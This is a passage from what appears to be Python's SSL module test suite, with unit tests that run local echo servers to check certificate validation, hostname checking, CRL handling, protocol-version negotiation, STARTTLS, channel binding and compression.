sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except Exception:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with socket.socket() as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
# ENOENT means the given cert file does not exist
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_npn_protocol': s.selected_npn_protocol()
})
s.close()
stats['server_npn_protocols'] = server.selected_protocols
return stats
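# Typical use of server_params_test(), as in the protocol tests below
# (a sketch; CERTFILE comes from the suite's data files):
#
#     ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
#     ctx.load_cert_chain(CERTFILE)
#     stats = server_params_test(ctx, ctx, chatty=False)
#     # stats['cipher'], stats['peercert'], stats['compression'], ...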
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
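# Example of the helper above, as the ThreadedTests use it: a TLSv1
# client is expected to fail against an SSLv23 server that disables
# TLSv1:
#
#     try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
#                        server_options=ssl.OP_NO_TLSv1)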
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, True)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, True,
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique?
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
